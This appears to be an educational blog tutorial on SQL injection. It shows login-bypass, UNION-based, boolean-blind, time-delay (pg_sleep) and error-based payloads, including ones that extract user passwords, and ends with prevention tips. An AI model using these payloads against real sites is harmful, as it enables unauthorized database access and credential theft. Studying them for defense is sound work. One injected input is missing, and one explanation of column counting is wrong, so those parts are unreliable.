Introduction
Before learning about SQL injection, it's important to understand SQL.SQL (Structured Query Language) is a language used to manage and interact with databases. It helps you create, update, or delete data.
SQL injection is a type of web security vulnerability that allows attackers to inject malicious SQL queries to gain unauthorized access to the database.The attacker send his query to the site by somehow and if he is able to execute the query then the site is vulnerable to SQL injection .
A successful SQL injection attack lets hackers steal important data like passwords, credit card details, and personal info. This type of attack has caused big data breaches, hurting companies' reputations and leading to fines. Sometimes, hackers can even create a secret way to stay in the system without being noticed for a long time.
Motives behind SQL Injection
Data Stealing
Data Manipulation
Authentication Bypass
Financial Gain
Backdoor Creation
Website Defacement
Examples of SQL Injection
SQL Injection (SQLi) is performed by manipulating a web application’s input fields to insert malicious SQL queries into the database.
Attackers look for places where a website or app takes user input, such as:
Login forms
Search bars
URL parameters
Feedback forms
Bypassing Login :
A login page mainly contains username and password. When we type ‘admin’ username and ‘admin123’ as password site will take this query :
SELECT * FROM users WHERE username = “admin” AND password = “admin123”;
When we inject the query as :
This will send the query :
SELECT * FROM users WHERE username = 'student'-- AND password = '';
The double hyphen “—” indicates comments.In above query
AND password = “”;
part is ignored and it will show all the data of user whose username is ‘student’ if the site is vulnerable to SQLI .We can also try :
SELECT * FROM users WHERE username = 'student' OR '1' ='1'-- AND password = '';
Union Based SQL Injection
Union is used to send with another query in the existing query of a site .
Attacker can add any query like this in any vulnerable place like search,login etc.
‘ UNION SELECT username,password from users—
Then the new query will become :
SELECT * FROM products WHERE category=’food‘ UNION SELECT username,password from users—’;
Query information_schema.columns to list the columns in individual tables:
SELECT * FROM information_schema.columns WHERE table_name = 'Users';
This will return all the details of data having table_name Users.
To Find Number of columns:
To find Number of columns of hidden table we can use a query :
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
If the Number of Columns is not equal to the number of “NULL” in the query then it will give an error .
To find number of columns we gradually increase the “NULL” value until we stop getting errors and then the Number of Columns is not equal to the number of “NULL”.
Another method ;
‘ORDER BY 1--
‘ORDER BY 2--
If the number (1 ,2 ,..) in the query is less then or equal the number of columns then it will not give any error But if the Number in the query is greater then number of columns then it will give an error .
Blind SQL Injection
Blind SQL Injection is a type of SQL injection attack that occurs when a web application is vulnerable to SQL injection, but the attacker cannot see the result of the SQL query directly.
When you try this queries on a site :
‘AND 1 = 1
‘AND 1 = 2
If the site works normally while injecting first query and it doesn’t give the desired output while giving second query then the site is vulnerable and attacker can inject any boolean based query to get credential information .
For Eg :
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
This query is checking if the first letter of password of administrator is a ; If yes then it will return 1 and site will work normally but if no then it will return 0 and site will not give the desired output.
Using time delay :
TrackingId=xyz'; SELECT CASE WHEN (1=2) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -> No delay
TrackingId=xyz'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -> Delay
This mean site is vulnerable to inject using time delay
Error Based SQL Injection
Error-based SQL injection refers to cases where you're able to use error messages to get sensitive data from the database, even in blind contexts.
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
These inputs use the CASE keyword to test a condition and return a different expression depending on whether the expression is true:
With the first input, the CASE expression evaluates to 'a', which does not cause any error.
With the second input, it evaluates to 1/0, which causes a divide-by-zero error.
Prevention to SQL Injection
Use prepared statements or parameterized queries.
Check and clean all user inputs.
Use stored procedures to run queries.
Use frameworks that prevent SQL injection.
Escape special characters in inputs.
Limit database user permissions.
Keep software and libraries up to date.
Regularly test and review your code for security.